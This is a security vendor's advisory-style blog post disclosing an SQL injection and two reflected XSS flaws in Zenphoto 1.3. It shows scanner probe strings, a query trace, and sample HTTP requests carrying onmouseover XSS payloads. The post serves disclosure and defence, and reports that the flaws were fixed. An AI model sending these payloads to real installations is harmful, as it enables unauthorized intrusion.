Note: This article refers to an older version of Acunetix. Click here to download the latest version.

We are continuing with the list of security vulnerabilities found in a number of web applications while testing our latest version of Acunetix WVS v7 . In this blog post, we will look into the details of a number of security problems discovered by Acunetix WVS in the popular web gallery application Zenphoto;

Zenphoto is a standalone gallery CMS that just makes sense and doesn’t try to do everything and your dishes. We hope you agree with our philosophy: simpler is better. Don’t get us wrong though – Zenphoto really does have everything you need for web media gallery management.

The following web vulnerabilities were found in Zenphoto Version 1.3;

  1. SQL injection in “/zenphoto_1_3/zp-core/full-image.php”, parameter “a”.
  2. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “from”.
  3. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “user”.

Technical details about each web vulnerability are below:

1. SQL injection in “/zenphoto_1_3/zp-core/full-image.php”, parameter “a”.

Source file: /var/www/zenphoto_1_3/zp-core/functions-db.php line: 65

Additional details:

SQL query:

SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/
 	ACUEND"

“mysql_query” was called.

Stack trace:

1. query([string] "SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/n 	ACUEND"", [boolean] false)
  2. query_full_array([string] "SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/n 	ACUEND"")
  3. getAlbumInherited([string] "1ACUSTART'"*/n 	ACUEND", [string] "album_theme", [NULL] )
  4. themeSetup([string] "1ACUSTART'"*/n 	ACUEND")

As you can see in the SQL query (or the stack trace), in order to alter the SQL statement sent to the database you need to use a double qoute (not a single one, as in most SQL injections).

Sample HTTP Request:

GET /zenphoto_1_3/zp-core/full-image.php?a=%24%7binjecthere%7d&i=system-bug.jpg&q=75 HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

2. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “from”.

Attack details

URL encoded GET input from was set to ” onmouseover=prompt(934419) bad=”.
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

GET /zenphoto_1_3/zp-core/admin.php?from=%22%20onmouseover%3dprompt%28934419%29%20bad%3d%22 HTTP/1.1
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)


3. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “user”.

Attack details

URL encoded POST input user was set to ” onmouseover=prompt(932890) bad=”.
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

POST /zenphoto_1_3/zp-core/admin.php HTTP/1.1
Content-Length: 149
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

code_h=1644ca84b35bf7663c5e828744339de8&login=1&pass=acUn3t1x&redirect=%2fzp-core%2fadmin.php&user=%22%20onmouseover%3dprompt%28932890%29%20bad%3d%22

These vulnerabilities were reported to the Zenphoto team on 22/7/2010 via the trac system on their website and they were fixed in latest version of Zenphoto. If you are using Zenphoto, download the latest version from their website.

SHARE THIS POST
THE AUTHOR
Bogdan Calin

Acunetix developers and tech agents regularly contribute to the blog. All the Acunetix developers come with years of experience in the web security sphere.